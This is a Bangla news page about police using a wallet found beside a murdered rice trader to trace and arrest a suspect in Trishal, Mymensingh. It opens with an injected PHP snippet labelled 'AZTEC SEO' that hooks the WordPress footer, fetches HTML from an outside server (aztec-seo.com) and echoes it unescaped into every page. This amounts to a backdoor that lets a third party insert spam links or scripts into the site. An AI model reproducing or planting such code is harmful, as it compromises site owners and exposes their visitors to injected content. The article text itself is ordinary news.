/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); লাশের পাশে পড়ে থাকা মানিব্যাগের সূত্র ধরে আসামি গ্রেফতার | Dhaka Sky News

মসিকের জলাবদ্ধতা নিরসনে সোয়া ৮ কিমি খাল পুনঃখনন কর্মসূচি

আগের সংবাদ

হঠাৎ গাড়ি থামিয়ে নিজে কবরে নেমে লাশ দাফন করলেন তথ্য প্রতিমন্ত্রী

পরের সংবাদ

লাশের পাশে পড়ে থাকা মানিব্যাগের সূত্র ধরে আসামি গ্রেফতার

ময়মনসিংহ ব্যুরো

প্রকাশিত: March 29, 2026 , 6:53 pm

লাশের পাশে পড়ে থাকা একটি মানিব্যাগের সূত্র ধরে ময়মনসিংহের ত্রিশালে চাল ব্যবসায়ী সুসেন চন্দ্র সরকার (৬২) হত্যার আসামিকে গ্রেফতার করেছে পুলিশ।

শনিবার (২৮ মার্চ) রাত ১১টার দিকে গাজীপুর জেলার শ্রীপুর উপজেলার বটতলা এলাকা থেকে তাবারক আকন্দ কামাল (৫৭) নামের একজনকে গ্রেফতার করা হয়।

পুলিশ জানায়, গত বছরের ৯ ফেব্রুয়ারি রাতে অজ্ঞাতনামা দুর্বৃত্তরা ত্রিশাল উপজেলার সাউথকান্দা এলাকায় ভাই ভাই এন্টারপ্রাইজ নামের ব্যবসা প্রতিষ্ঠানে ঢুকে সুসেন চন্দ্র সরকারকে এলোপাতাড়ি কুপিয়ে হত্যা করে। ঘটনার পরদিন ত্রিশাল থানায় একটি হত্যা মামলা করা হয়।

নিহত সুসেন চন্দ্র সরকার ত্রিশাল উপজেলার সাউথকান্দা গ্রামের বাসিন্দা এবং ভাই ভাই এন্টারপ্রাইজের মালিক ছিলেন।

গ্রেফতারকৃত তাবারক ত্রিশাল উপজেলার আমিরাবাড়ি (সাইনবোর্ড) এলাকার মৃত আব্দুর রশিদ আকন্দের ছেলে।

পুলিশের তদন্তকালে ঘটনাস্থলে মরদেহের পাশ থেকে একটি মানিব্যাগ জব্দ করা হয়। মানিব্যাগে থাকা জন্মনিবন্ধন সনদের সূত্র ধরে তথ্য-প্রযুক্তির সহায়তায় আসামিকে শনাক্ত করে জেলা গোয়েন্দা পুলিশ (ডিবি)। পরে অভিযান চালিয়ে গাজীপুরের শ্রীপুর থেকে তাকে গ্রেফতার করা হয়।

ময়মনসিংহ জেলা পুলিশের অতিরিক্ত পুলিশ সুপার (অর্থ ও প্রশাসন) মো. আব্দুল্লাহ আল মামুন বলেন, প্রাথমিক তদন্তে গ্রেফতারকৃত ব্যক্তি হত্যাকাণ্ডে সরাসরি জড়িত বলে জানা গেছে। ঘটনার সময় তিনি অন্য আসামিদের সঙ্গে পরিকল্পিতভাবে ব্যবসা প্রতিষ্ঠানে প্রবেশ করে সুসেন চন্দ্র সরকারকে হত্যা করেন। এ ঘটনায় অন্য আসামিদের গ্রেফতারের চেষ্টা চলছে।